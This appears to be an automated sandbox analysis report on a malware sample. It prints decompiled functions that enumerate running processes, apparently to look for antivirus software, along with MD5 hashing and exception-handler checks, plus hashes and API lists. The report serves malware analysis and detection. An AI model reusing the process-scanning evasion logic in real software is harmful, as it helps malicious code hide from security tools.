Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: a17cedfe2183bba0f2609c6b62c17eb605b46d6bc65e99a6e6b0aa36c0ad662e
Instruction ID: 672e3b338e8d9e526fa5e7e5c73f497d514560eac1622603ee04a2e442b5b559
Opcode Fuzzy Hash: a17cedfe2183bba0f2609c6b62c17eb605b46d6bc65e99a6e6b0aa36c0ad662e
Instruction Fuzzy Hash: 9F3119B2A00209EFD710DF69DC81AAEB7F9FB49360F118429E501D3251EB70ED01AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FA229C, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00FA229C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xfad230; // 0x2a9a5a8
						_t2 = _t9 + 0xfaedf8; // 0x73617661
						_push( &_v264);
						if( *0xfad114() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00fa22a7
0x00fa22b1
0x00fa22b5
0x00fa22bf
0x00fa22f0
0x00fa22c6
0x00fa22cb
0x00fa22d8
0x00fa22e1
0x00fa22f8
0x00fa22e3
0x00fa22eb
0x00000000
0x00fa22eb
0x00fa22f9
0x00fa22fa
0x00000000
0x00fa22fa
0x00000000
0x00fa22f4
0x00fa2300
0x00fa2305

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FA22AC
Process32First.KERNEL32(00000000,?), ref: 00FA22BF
Process32Next.KERNEL32(00000000,?), ref: 00FA22EB
CloseHandle.KERNEL32(00000000), ref: 00FA22FA

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 62c2a1c6c105ca3e5ad79b646179b47f47a990e151ab46787574ee7e8e88d5c3
Instruction ID: cf7b6bb817c77c39272c48dcd5e9d7c4bd771f12fa0d28be2303bbe67c7b0820
Opcode Fuzzy Hash: 62c2a1c6c105ca3e5ad79b646179b47f47a990e151ab46787574ee7e8e88d5c3
Instruction Fuzzy Hash: 92F096F270002867E760A7699C09FEB76ECEBC7350F000051F916D3001EA249A56A6B1

Uniqueness

Uniqueness Score: -1.00%

Function 1000166F, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000166F() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x1000412c = _t3;
					_t5 = GetCurrentProcessId();
					 *0x10004128 = _t5;
					 *0x10004130 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x10004124 = _t6;
					if(_t6 == 0) {
						 *0x10004124 =  *0x10004124 | 0xffffffff;
					}
					return 0;
				}
			}

0x10001670
0x1000167e
0x10001686
0x1000168b
0x100016d5
0x100016d5
0x1000168d
0x10001695
0x100016d1
0x100016d3
0x10001697
0x10001697
0x1000169c
0x100016aa
0x100016af
0x100016b5
0x100016bd
0x100016c2
0x100016c4
0x100016c4
0x100016ce
0x100016ce

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,10001011), ref: 1000167E
GetVersion.KERNEL32(?,10001011), ref: 1000168D
GetCurrentProcessId.KERNEL32(?,10001011), ref: 1000169C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,10001011), ref: 100016B5

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 0c09198f28dba07cf6fdc50ecb270a855563c6de9ed9195e2418db81d984c73e
Instruction ID: 641a3cf296a655062fda960f47df27ee06cd82fa7e419a9457c017bc58596f36
Opcode Fuzzy Hash: 0c09198f28dba07cf6fdc50ecb270a855563c6de9ed9195e2418db81d984c73e
Instruction Fuzzy Hash: ABF067B1A412309FF741AF68AD897C63BE8E3187D2F02811AF281D90ECDBB044808B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00FA40B3, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00FA40B3(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x00fa40b6
0x00fa40c1
0x00fa40c4
0x00fa40c7
0x00fa40c8
0x00fa40c8
0x00fa40d3
0x00fa40e4
0x00fa40e6
0x00fa40e9
0x00fa40e9
0x00fa40ec
0x00fa40ec
0x00fa40ef
0x00fa40ef
0x00fa40f2
0x00fa40f2
0x00fa410f
0x00fa4112
0x00fa4128
0x00fa412b
0x00fa4145
0x00fa4148
0x00fa415e
0x00fa4161
0x00fa4163
0x00fa417b
0x00fa417e
0x00fa4181
0x00fa4199
0x00fa419c
0x00fa41b6
0x00fa41b9
0x00fa41cf
0x00fa41d2
0x00fa41d4
0x00fa41ec
0x00fa41f1
0x00fa41f4
0x00fa420a
0x00fa420d
0x00fa4227
0x00fa422a
0x00fa4240
0x00fa4243
0x00fa4245
0x00fa4260
0x00fa4263
0x00fa427a
0x00fa427d
0x00fa4281
0x00fa429a
0x00fa429d
0x00fa429f
0x00fa42a2
0x00fa42bd
0x00fa42c0
0x00fa42d9
0x00fa42dc
0x00fa42ec
0x00fa42ef
0x00fa4307
0x00fa430a
0x00fa4324
0x00fa4327
0x00fa433f
0x00fa4342
0x00fa4358
0x00fa435b
0x00fa4373
0x00fa4376
0x00fa438e
0x00fa4391
0x00fa43ab
0x00fa43ae
0x00fa43c4
0x00fa43c7
0x00fa43df
0x00fa43e2
0x00fa43fc
0x00fa43ff
0x00fa4417
0x00fa441a
0x00fa4430
0x00fa4433
0x00fa444b
0x00fa444e
0x00fa4466
0x00fa4469
0x00fa447b
0x00fa447e
0x00fa4490
0x00fa4493
0x00fa44a5
0x00fa44a8
0x00fa44ac
0x00fa44bc
0x00fa44bf
0x00fa44cd
0x00fa44d0
0x00fa44e2
0x00fa44e5
0x00fa44f9
0x00fa44fc
0x00fa44fe
0x00fa450e
0x00fa4511
0x00fa4523
0x00fa4526
0x00fa4534
0x00fa4537
0x00fa4549
0x00fa454c
0x00fa4550
0x00fa4560
0x00fa4563
0x00fa4575
0x00fa4578
0x00fa4586
0x00fa4589
0x00fa459b
0x00fa459e
0x00fa45b0
0x00fa45b3
0x00fa45c7
0x00fa45ca
0x00fa45de
0x00fa45e1
0x00fa45f5
0x00fa45f8
0x00fa460c
0x00fa460f
0x00fa4623
0x00fa4626
0x00fa463a
0x00fa463f
0x00fa4651
0x00fa4654
0x00fa4668
0x00fa466b
0x00fa467f
0x00fa4682
0x00fa4698
0x00fa469b
0x00fa46af
0x00fa46b2
0x00fa46c4
0x00fa46c7
0x00fa46db
0x00fa46de
0x00fa46f2
0x00fa46f5
0x00fa4709
0x00fa4712
0x00fa4715
0x00fa471e
0x00fa4727
0x00fa472f
0x00fa4737
0x00fa4741
0x00fa4756

APIs

memset.NTDLL ref: 00FA474A

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 9a35ab16c410ebec120d6e973322aca9da4e54b7e5eae7d9a565d0bb68c1b7f3
Instruction ID: 8f6349d4561ef1cbf69fcd8a91682ee454d988ef387e1592c6d1a119806a3d1c
Opcode Fuzzy Hash: 9a35ab16c410ebec120d6e973322aca9da4e54b7e5eae7d9a565d0bb68c1b7f3
Instruction Fuzzy Hash: DD22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB169, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FAB169(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xfad288; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xfad2d0 = 1;
										__eflags =  *0xfad2d0;
										if( *0xfad2d0 != 0) {
											goto L60;
										}
										_t84 =  *0xfad288; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xfad2d0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xfad288 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xfad290 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xfad28c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xfad290 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xfad290 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xfad2d0 = 1;
							__eflags =  *0xfad2d0;
							if( *0xfad2d0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xfad290 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xfad290 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xfad2d0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xfad290 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xfad288 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xfad290 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xfad290 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00fab173
0x00fab176
0x00fab17c
0x00fab19a
0x00000000
0x00fab19a
0x00fab184
0x00fab18d
0x00fab193
0x00fab1a2
0x00fab1a5
0x00fab1a8
0x00fab1b2
0x00fab1b2
0x00fab1b4
0x00fab1b7
0x00fab1b9
0x00fab1b9
0x00fab1bb
0x00fab1be
0x00000000
0x00000000
0x00fab1c0
0x00fab1c2
0x00fab228
0x00fab228
0x00fab386
0x00000000
0x00fab386
0x00fab1c4
0x00fab1c4
0x00fab1c8
0x00fab1ca
0x00fab1ca
0x00fab1ca
0x00fab1ca
0x00fab1cd
0x00fab1ce
0x00fab1d1
0x00fab1d1
0x00fab1d5
0x00fab1d9
0x00fab1e7
0x00fab1e7
0x00fab1ef
0x00fab1f5
0x00fab1f7
0x00fab1f9
0x00fab209
0x00fab216
0x00fab21a
0x00fab21f
0x00fab221
0x00fab29f
0x00fab29f
0x00fab223
0x00fab223
0x00fab223
0x00fab2a1
0x00fab2a3
0x00fab384
0x00fab384
0x00000000
0x00fab2a9
0x00fab2a9
0x00fab2b0
0x00000000
0x00000000
0x00fab2b6
0x00fab2ba
0x00fab316
0x00fab318
0x00fab320
0x00fab322
0x00fab324
0x00000000
0x00000000
0x00fab326
0x00fab32c
0x00fab32e
0x00fab330
0x00fab345
0x00fab345
0x00fab347
0x00fab376
0x00fab37d
0x00000000
0x00fab37d
0x00fab34b
0x00fab34c
0x00fab34e
0x00fab350
0x00fab350
0x00fab352
0x00fab354
0x00fab356
0x00fab36a
0x00fab36a
0x00fab36d
